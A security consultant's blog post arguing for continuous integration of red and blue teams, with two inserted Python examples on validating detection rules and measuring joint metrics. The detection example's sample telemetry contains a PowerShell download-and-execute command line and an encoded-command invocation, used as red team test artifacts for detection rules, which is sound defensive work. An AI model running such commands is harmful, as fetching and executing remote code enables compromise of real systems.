Your Red Team and Blue Team Don't Talk. That's Why You Keep Getting Breached.
- Keith Pachulski
- Oct 14
- 11 min read

Last week I watched something that happens constantly in our industry.
A client's blue team was investigating suspicious traffic. Nothing crazy—just odd patterns in their Splunk. Meanwhile, their red team was two floors up running a pentest using the exact same techniques the blue team was tracking.
Nobody told anyone. The teams don't talk.
Real attackers don't work in silos. They run automated recon, exploit vulnerabilities in real time and adapt to your defenses faster than your ticket queue updates. They operate like a single coordinated unit with shared intelligence, shared tools and shared objectives.
Your defense? Two teams that barely share a calendar.
The Traditional Model Doesn't Work Anymore
We've accepted this organizational structure for years as just "how security teams work":
Blue Team operates the SOC, monitors alerts, responds to incidents, maintains defensive tooling. They're measured on mean time to detect and mean time to respond. Their world is dashboards, SIEM queries and alert fatigue.
Red Team runs periodic assessments, finds vulnerabilities, writes detailed reports and moves on to the next engagement. They're measured on findings count and successful exploits. Their world is exploit frameworks, command-and-control infrastructure and proof-of-concept demonstrations.
Neither team is failing at their job. The problem is that the gap between them, the organizational and operational space where information doesn't flow, is exactly where sophisticated attackers are winning.
What I'm Actually Seeing in the Field
Three weeks ago I reviewed an incident response at a financial services company. They had both a mature SOC with a dedicated team of analysts and an established red team that ran quarterly assessments. Good budget, good people, good intentions.
The breach worked because the attacker used a specific living-off-the-land technique involving PowerShell and WMI that the red team had documented in excruciating detail six months earlier during a penetration test. The finding was in a 47-page report that went to the CISO's office. The blue team never saw it. Different reporting chains, different priorities, different meetings, different ticketing systems.
The cost? Six figures in incident response and remediation. Customer notification letters. Board presentations. The whole nightmare.
When I asked the SOC manager if they'd seen the red team's report, he said "I didn't even know we had a red team report from that quarter." When I asked the red team lead if they'd shared their TTPs with the SOC, he said "we sent the report to leadership—that's our deliverable."
Both answers were technically correct. Both teams did their jobs. The organization still got breached.
This isn't an isolated case.
In another example, we talked with a healthcare organization where the blue team implemented new EDR controls that the red team could bypass in under an hour, but nobody thought to test them before deployment. The red team found out about the new controls the same way everyone else did: via email announcement.
A manufacturing company where the red team discovered critical vulnerabilities in their OT environment that the blue team's monitoring couldn't detect because nobody had ever configured OT-specific detection logic. The blue team didn't know what "normal" looked like in that environment.
A tech startup where attackers used the exact same initial access vector, a specific phishing technique targeting their SSO implementation, that the red team had demonstrated in a tabletop exercise eight months prior. The blue team had been in that room, but never translated the scenario into actual detection rules.
An enterprise where both teams used completely different threat intelligence feeds, different frameworks for categorizing attacks, and different terminology for describing the same techniques. When they tried to collaborate during an incident, they literally couldn't communicate effectively.
Organizations spending millions on security tools, "next-gen firewalls", EDR, SIEM, SOAR platforms, without the integrated expertise to configure them properly because the people who understand how attacks work don't talk to the people who configure the defenses.
The gap isn't just inefficient. It's actively dangerous. It's a structural vulnerability that attackers exploit as reliably as an unpatched CVE.
Why Attackers Are Winning This Game
Based on threat intelligence and attack pattern analysis from recent incidents, modern threat actors (nation-state APT groups, organized cybercrime syndicates, sophisticated ransomware operators) operate as unified teams. They don't have red teams and blue teams. They have operational teams.
Look at how these attacks actually unfold. Initial reconnaissance directly informs exploitation attempts. Successful exploitation determines privilege escalation methods. Privilege escalation results shape lateral movement paths. Lateral movement discovers new targets for reconnaissance.
One continuous operational loop.
The attack patterns we're analyzing show increasing automation and coordination. Reconnaissance frameworks are mapping entire environments (subnets, systems, services, trust relationships) in hours instead of days. Attack groups are clearly testing their methods before deploying them, evidenced by the polish and efficiency we see in actual breaches.
What stands out in incident analysis is the operational sophistication. These groups have better documentation practices than most corporate security teams. Their attack chains show careful planning and coordination. They adapt mid-attack based on what they discover about defenses.
They operate like water, flowing through whatever gap exists. And here's what keeps showing up in incident after incident: the gap that matters isn't usually in the firewall rules or patch management or endpoint protection. It's in the space between the people who know how attacks work and the people defending against them.
Why Purple Team Exercises Miss the Point
I know what you're thinking right now. "Keith, we do purple team exercises. We've got this covered. We run them quarterly, sometimes more. Red team attacks, blue team defends, we all learn something."
Good. I'm glad you're doing them. But it's not enough.
Most purple team exercises I see are events. They're scheduled activities with a defined start time, defined scope, and defined end time. Red team runs an attack scenario, blue team watches or responds, everyone sits in a conference room afterward and discusses lessons learned, maybe someone takes notes, and then both teams go back to their separate operational worlds.
It's like a joint training exercise between two military units that ends when everyone goes home. Valuable? Sure. But it's not the same as those units actually operating together in the field.
The problems I'm describing aren't solved by quarterly events. They're solved by continuous operational integration.
When I talk to security leaders about their purple team programs, I ask a simple question: "Three months after your last purple team exercise, how many of the red team's attack techniques are now detectable by your blue team's monitoring?"
The answer is usually somewhere between "some" and "we're not really sure."
That gap, between learning something during an exercise and actually operationalizing that knowledge into your defensive posture, is where the value gets lost.
What Operational Integration Actually Looks Like
The organizations that are adapting successfully to this reality aren't just scheduling more purple team exercises. They're fundamentally restructuring how offensive and defensive capabilities work together on a continuous basis.
I worked with a financial services company last year that made this transition. Their starting point was typical: the red team reported to the CTO, the blue team reported to the CISO, they ran purple team exercises twice a year, and they kept finding the same types of gaps during incident response.
Here's what they changed.
First, they created shared operational visibility. Both teams now work from the same platforms. When the red team conducts any testing, whether it's a formal assessment or just validating a new attack technique they read about, the artifacts, TTPs, and indicators are immediately visible to the blue team. Not in a report that gets delivered weeks later. Immediately.
When the blue team deploys a new detection rule or modifies their SIEM correlation logic, the red team can see exactly what they're trying to detect and can validate whether it would actually work against real attacker methods. Not theoretical attacks from a textbook. Real methods they've used in actual engagements.
They implemented continuous threat-informed defense. When a blue team analyst sees a new attack technique in a threat intelligence report, they can ask the red team "can you replicate this in our lab environment?" Within hours, not weeks, they're testing whether their current defenses would catch it.
When the red team discovers a new bypass technique for their EDR or a weakness in their network segmentation, they don't wait for the next assessment cycle. They document it immediately and work with the blue team to understand why the detection didn't fire and what needs to change.
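Here is what "validate whether it would actually work" looks like at the smallest scale, as an added example that is not code from the original post: constructed Sysmon-style process-creation events, two illustrative detection rules standing in for SIEM correlation logic, and a check that matches each red team test id against the rules that fired. The encoded-command and WMI-spawns-PowerShell patterns, the hostnames, paths and test ids are all assumptions for illustration, not the technique from any engagement described above.

```python
"""Validate detection logic against red team test artifacts.

Added example, not code from the original post. The events are constructed
Sysmon-style process-creation records, and the two rules are illustrative
stand-ins for SIEM correlation logic, not any vendor's rules. The red team
tags each test artifact with a test id so the blue team can match what was
run against what fired.
"""
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str
    test_id: Optional[str] = None   # set by the red team on its own test artifacts


# Red team's record of what it exercised (constructed), keyed by test id.
RED_TEAM_TESTS = {
    "RT-001": "T1059.001 PowerShell launched with an encoded command",
    "RT-002": "T1047 WMI remote execution spawning PowerShell, no encoding",
}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed telemetry: two red team artifacts and one benign admin script.
EVENTS = [
    ProcessEvent("ws-17", r"C:\Windows\System32\cmd.exe", PS,
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A", "RT-001"),
    ProcessEvent("srv-04", r"C:\Windows\System32\wbem\WmiPrvSE.exe", PS,
                 "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://10.0.0.5/stage.ps1')\"", "RT-002"),
    ProcessEvent("ws-02", r"C:\Windows\explorer.exe", PS,
                 r"powershell.exe -File C:\scripts\inventory.ps1"),
]


def rule_encoded_powershell(e: ProcessEvent) -> bool:
    """PowerShell started with -enc/-EncodedCommand (a T1059.001 variant)."""
    cl = e.command_line.lower()
    return e.image.lower().endswith("powershell.exe") and (
        " -enc " in cl or " -encodedcommand " in cl)


def rule_wmi_spawns_shell(e: ProcessEvent) -> bool:
    """A shell whose parent is the WMI provider host (T1047 remote execution)."""
    child = e.image.lower().rsplit("\\", 1)[-1]
    return e.parent_image.lower().endswith(r"\wmiprvse.exe") and \
        child in {"powershell.exe", "cmd.exe"}


Rule = Callable[[ProcessEvent], bool]


def evaluate(events, rules: dict[str, Rule]):
    """Return ({test_id: set of rule names that fired}, [untagged events that fired]).

    The first value tells the blue team which red team tests its rules caught;
    the second surfaces false positives on telemetry the red team did not tag.
    """
    hits = {tid: set() for tid in RED_TEAM_TESTS}
    false_positives = []
    for e in events:
        fired = {name for name, rule in rules.items() if rule(e)}
        if e.test_id is not None:
            hits.setdefault(e.test_id, set()).update(fired)
        elif fired:
            false_positives.append((e.host, sorted(fired)))
    return hits, false_positives


def coverage_gaps(hits) -> list[str]:
    """Red team tests that no rule fired on: the shared problem to fix next."""
    return sorted(tid for tid, fired in hits.items() if not fired)


# The blue team's original ruleset only looked for encoded commands.
ORIGINAL_RULES = {"encoded_powershell": rule_encoded_powershell}
# After both teams review the RT-002 artifact, a parent-process rule is added.
UPDATED_RULES = {**ORIGINAL_RULES, "wmi_spawns_shell": rule_wmi_spawns_shell}


def gaps_before_and_after():
    """Gaps under the original rules, under the updated rules, and any false positives."""
    before, fp_before = evaluate(EVENTS, ORIGINAL_RULES)
    after, fp_after = evaluate(EVENTS, UPDATED_RULES)
    return coverage_gaps(before), coverage_gaps(after), fp_before + fp_after


if __name__ == "__main__":
    before, after, fps = gaps_before_and_after()
    print("gaps with original rules:", before)   # ['RT-002']
    print("gaps with updated rules: ", after)    # []
    print("false positives:", fps)               # []
```

The point of the test-id tag is that the same evaluation runs every time either side changes something: a new red team technique shows up as a new gap, and a rule change that stops catching an old one shows up the same way, without waiting for the next assessment cycle.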
The Cultural Shift Nobody Talks About
Here's the part that most articles about purple teaming or red-blue integration completely miss: the hardest part isn't technical. It's cultural.
I've worked with organizations that had all the right tools, all the right processes on paper, all the right executive support, and it still didn't work. Because the teams didn't trust each other.
Red teams often see blue teams as the people who make excuses for why they can't detect things. "That's a really sophisticated technique, we can't be expected to catch that."
Blue teams often see red teams as the people who criticize their work without understanding operational constraints. "Easy for you to find vulnerabilities when you don't have to maintain production systems."
Both perspectives have some validity. That's what makes it hard.
The red team that successfully transitioned to integrated operations wasn't the one with the best exploit developers. It was the one whose team lead stood up in a meeting and said "our job isn't to make blue team look bad. Our job is to make blue team better at their job. If we find something they can't detect, that's a shared problem we need to solve together."
The blue team that made it work wasn't the one with the fanciest SIEM. It was the one whose SOC manager said "when red team bypasses our defenses, that's not a failure. That's intelligence. They just showed us what a real attacker would do. Now we know what to fix."
That shift, from separate teams with separate goals to one integrated capability with a shared mission, doesn't happen because you reorganize the reporting structure or implement a new tool. It happens because leadership sets the expectation and both teams decide to operate differently.
I've seen this work at companies ranging from 500 employees to 5,000 employees. The size doesn't matter as much as the commitment to actually operating as one capability instead of two separate functions that occasionally coordinate.
What It Actually Takes to Make This Work
Let me be direct about what's required to make this transition, because I've seen plenty of organizations try and fail.
You need leadership that understands this isn't about reorganizing the security team for the sake of reorganization. It's about building a defensive capability that can actually adapt to modern threats. Your CISO or security director needs to be able to articulate to the board why integrated operations deliver better security outcomes than the traditional model, backed by metrics that matter to the business.
I worked with one organization where the CISO presented it this way: "We're currently spending $X per year on security testing and $Y per year on security operations. Despite this investment, our mean time to detect real attacks is 37 days, and we've had three incidents in the past year. By integrating these capabilities, we can cut our detection time to under 7 days and significantly reduce incident frequency. The cost is roughly the same. The outcome is dramatically better."
The board approved it immediately because the business case was clear.
You need both teams to see each other as complementary capabilities rather than competing priorities. This sounds obvious, but it's harder than it sounds when both teams have been measured on different metrics, rewarded for different outcomes and operated in different contexts for years.
The way I've seen this work best is to start with a small joint project, something where both teams clearly need each other to succeed. Not a purple team exercise. A real operational objective. "We need to validate whether our new zero-trust architecture would actually stop an attacker who's compromised a user account." Red team brings exploitation expertise. Blue team brings operational knowledge. Both teams are measured on whether the validation is thorough and whether the results lead to meaningful improvements.
You need workflows that support continuous collaboration instead of quarterly coordination. This means your ticketing systems need to talk to each other, your documentation needs to be shared, your daily standups need to include both perspectives, and your incident response procedures need to automatically engage both capabilities.
I've seen organizations waste months trying to integrate their tools before integrating their people. That's backwards. Start with the people collaborating, figure out what workflows actually help them work together, then implement tools that support those workflows.
You need metrics that reflect integrated effectiveness rather than individual team accomplishments. If you're still measuring red team on "number of critical findings" and blue team on "number of alerts processed," you haven't actually integrated. You've just put two separate teams in the same room.
Develop better metrics: the percentage of known attack techniques that your defenses can detect, the time from vulnerability discovery to deployment of a detection capability, the number of incidents detected using TTPs that the red team had previously tested, and the mean time to detect during continuous adversary emulation.
These metrics require both teams to succeed. Neither team can achieve them alone.
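As an added example (not code from the original post), the four metrics above computed in Python from a constructed shared register. The record layout, dates, incident ids and technique labels are all assumptions, chosen so the numbers surface the caveats a practitioner cares about: a deployed rule the red team could still bypass is not counted as coverage, and missed emulation runs are reported next to the mean rather than averaged away.

```python
"""Metrics that only an integrated red/blue program can produce.

Added example, not code from the original post. Every record is constructed;
technique ids are ATT&CK-style labels used only as keys. The register is the
shared artifact both teams write to: the red team records when it documented
a technique, the blue team records when a detection shipped, and the red team
records whether that detection actually fired on re-test.
"""
from dataclasses import dataclass
from datetime import date, datetime
from statistics import median
from typing import Optional


@dataclass
class Technique:
    technique_id: str
    found_by_red: date                    # date the red team documented it
    detection_deployed: Optional[date]    # None = no detection yet
    validated_by_red: bool                # red team re-ran it and the rule fired


@dataclass
class EmulationRun:
    technique_id: str
    started: datetime
    first_alert: Optional[datetime]       # None = the run was never alerted on


@dataclass
class Incident:
    incident_id: str
    first_alert_technique: Optional[str]  # technique whose rule raised the first alert


REGISTER = [
    Technique("T1047",     date(2025, 1, 10), date(2025, 1, 24), True),
    Technique("T1059.001", date(2025, 1, 10), date(2025, 2, 9),  True),
    Technique("T1003.001", date(2025, 2, 3),  date(2025, 2, 10), False),  # shipped, bypass still works
    Technique("T1021.002", date(2025, 2, 20), None,              False),  # still an open gap
    Technique("T1566.002", date(2025, 3, 1),  date(2025, 3, 4),  True),
]

RUNS = [
    EmulationRun("T1047",     datetime(2025, 3, 10, 9, 0),  datetime(2025, 3, 10, 9, 4)),
    EmulationRun("T1059.001", datetime(2025, 3, 10, 10, 0), datetime(2025, 3, 10, 10, 12)),
    EmulationRun("T1003.001", datetime(2025, 3, 10, 11, 0), None),
    EmulationRun("T1566.002", datetime(2025, 3, 10, 12, 0), datetime(2025, 3, 10, 12, 2)),
]

INCIDENTS = [
    Incident("INC-101", "T1059.001"),
    Incident("INC-102", None),            # reported by a third party, no internal alert
    Incident("INC-103", "T1047"),
]


def detection_coverage(register) -> float:
    """Share of known techniques with a detection the red team has validated.

    A deployed-but-unvalidated rule does not count: that is the 'we think we
    catch this' gap, and it belongs in open_gaps, not in the coverage number.
    """
    covered = sum(1 for t in register if t.detection_deployed and t.validated_by_red)
    return covered / len(register)


def median_days_to_detection(register) -> float:
    """Median days from red team finding to a deployed detection.

    Techniques with no detection are excluded here and reported by open_gaps,
    so a growing backlog cannot hide inside this number.
    """
    days = [(t.detection_deployed - t.found_by_red).days
            for t in register if t.detection_deployed]
    return float(median(days))


def open_gaps(register) -> dict[str, list[str]]:
    """Techniques with no detection, and ones whose detection failed re-test."""
    return {
        "no_detection": [t.technique_id for t in register if not t.detection_deployed],
        "failed_validation": [t.technique_id for t in register
                              if t.detection_deployed and not t.validated_by_red],
    }


def incidents_caught_by_tested_ttps(incidents, register) -> int:
    """Incidents whose first alert came from a rule the red team's testing drove."""
    tested = {t.technique_id for t in register if t.detection_deployed}
    return sum(1 for i in incidents if i.first_alert_technique in tested)


def emulation_mttd_minutes(runs) -> tuple[float, int]:
    """(mean minutes to first alert over alerted runs, count of runs never alerted).

    The miss count travels with the mean because averaging only the hits
    would make a program that misses half its runs look fast.
    """
    deltas = [(r.first_alert - r.started).total_seconds() / 60
              for r in runs if r.first_alert is not None]
    missed = sum(1 for r in runs if r.first_alert is None)
    return (sum(deltas) / len(deltas) if deltas else float("nan"), missed)


if __name__ == "__main__":
    print(f"validated detection coverage: {detection_coverage(REGISTER):.0%}")        # 60%
    print(f"median days finding -> detection: {median_days_to_detection(REGISTER)}")  # 10.5
    print("open gaps:", open_gaps(REGISTER))
    print("incidents caught via tested TTPs:", incidents_caught_by_tested_ttps(INCIDENTS, REGISTER))  # 2
    print("emulation MTTD (min), missed runs:", emulation_mttd_minutes(RUNS))         # (6.0, 1)
```

Each number depends on a field only the other team can fill in, which is what makes these metrics joint rather than a red team score and a blue team score sitting side by side.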
You need a security stack that supports unified operations. This doesn't mean buying new tools. It means configuring your existing tools so that both teams can work from the same operational picture. Your SIEM needs to ingest data from red team testing. Your ticketing system needs to track both vulnerabilities and detection gaps. Your threat intelligence platform needs to include both external threats and internal red team findings.
Most organizations already have the tools they need. They just haven't configured them to support integrated operations.
What Happens If You Don't Do This
Let me paint you a picture of what the next three years look like if you keep operating with separate red and blue teams.
Your attackers will continue getting more sophisticated. They're already using automation, machine learning and continuous adaptation. The gap between their operational tempo and yours will keep growing.
You'll keep having incidents where somebody says "wait, didn't we test this?" and the answer is yes, you did test it, six months ago and nothing changed.
You'll keep spending money on security tools that don't integrate with your operational workflows, generating alerts that your team doesn't have context to evaluate effectively.
You'll keep losing people. Your best red teamers will leave because they're tired of finding problems that don't get fixed. Your best blue teamers will leave because they're tired of getting blamed for breaches that used techniques nobody told them about.
Your board will keep asking why the security budget keeps increasing while incidents keep happening.
But here's what happens if you do integrate these capabilities.
You build a security program that learns from every test, every incident, every near-miss. Your defenses get stronger continuously, not just during assessment cycles.
You detect real attacks faster because your blue team has been trained against realistic attack patterns by your red team and your red team has validated that the detections actually work.
You respond to incidents more effectively because you have people who understand both how attackers operate and how your specific environment works, collaborating in real-time.
You make better investment decisions because both offensive and defensive perspectives inform your security roadmap.
You retain your best people because they're doing meaningful work that delivers visible results instead of generating reports that disappear into the void.
The organizations that figure this out over the next couple of years will have security programs that can actually keep pace with the threats they face. The ones that don't will keep writing the same incident response reports with different dates at the top.
Let's Talk About Your Situation
I help organizations make this transition. Not by selling them new tools or running purple team exercises. By deploying integrated operational models that treat offensive and defensive capabilities as parts of the same adaptive security capability.
The results I'm seeing: organizations cutting their mean time to detect sophisticated attacks by 60-70%, reducing incident frequency by half or more, and significantly improving their security team's effectiveness without increasing headcount.
If your red and blue teams are still operating in separate worlds—separate meetings, separate priorities, separate workflows—we should talk. I'll share specifically what's working for organizations similar to yours in terms of size, industry, and threat model. We can figure out whether integrated operations makes sense for your environment and what a realistic implementation would look like given your current constraints.
Not a sales pitch. A conversation about whether this approach would actually work in your situation. If it would, we'll talk about what that looks like. If it wouldn't, I'll tell you that too and probably point you toward something that would work better.
Best,
Keith Pachulski
Red Cell Security, LLC
📅 Book time with me: https://outlook.office365.com/book/redcellsecurity@redcellsecurity.org/